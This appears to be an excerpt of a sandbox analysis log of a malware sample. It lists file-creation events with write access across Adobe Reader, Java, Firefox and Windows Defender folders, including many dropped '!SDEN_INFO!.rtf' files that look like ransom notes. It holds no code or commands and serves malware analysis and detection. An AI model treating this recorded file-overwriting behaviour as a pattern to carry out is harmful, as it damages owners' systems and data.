| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\2d.x3d | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\de-CH\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ca-es\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ko-kr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sv-se\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\pt-br\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\da-dk\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\hr-hr\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\root\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\fi-fi\!SDEN_INFO!.rtf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL |
|
1 | |
| Create | C:\Logs\Setup.evtx | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\add_reviewer.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_received.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\zh-cn\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\en-MY\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\ind_prog.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\javaws.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\en-il\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviews_super.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\submission_history.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\es-US\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\UIThemes\LightTheme.acrotheme | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\forms_super.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\review_browser.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\RHP_icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\bin\rmid.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-high-contrast.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner_mini.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\gl-ES\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\icons.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\amd64\jvm.cfg | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-144x144-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\tl.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\lb-LU\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_bow.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\pt-BR\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\resources\style_ltr.min.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Content1\th-TH\index.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\base_uris.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\currency.data | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\dd_arrow_small.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\adobe_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\icons_ie8.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-144x144-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\deploy\messages_zh_CN.properties | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\Logs\UniversalNotificationPlatform.004.etl | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\illustrations_retina.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\de-de\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\dnsns.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\apple-touch-icon-57x57-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hu-hu\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\cloud_icon.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\fonts\EmojiOneMozilla.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\themes\dark\arrow-down.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-right.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\es-es\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_hiContrast_wob.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\progress_spinner.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Comments.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\large_trefoil_2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account-select\css\main.css | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\ext\zipfs.jar | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions2x.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-right.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left-pressed.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-ae\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\apple-touch-icon-57x57-precomposed.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-up.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Home.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-down.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-left.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-gb\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\images\themes\dark\rhp_world_icon_hover.png | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Mozilla Firefox\plugin-container.exe | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ind_prog.gif | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\Java\jre1.8.0_144\lib\fonts\LucidaTypewriterBold.ttf | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\it-it\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\fi-fi\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\libs\require\2.1.15\require.min.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Adobe.Reader.Dependencies.manifest | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\sk-sk\ui-strings.js | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\license.html | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Program Files\UNP\CampaignManager\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Config_131491847713900000.json | desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
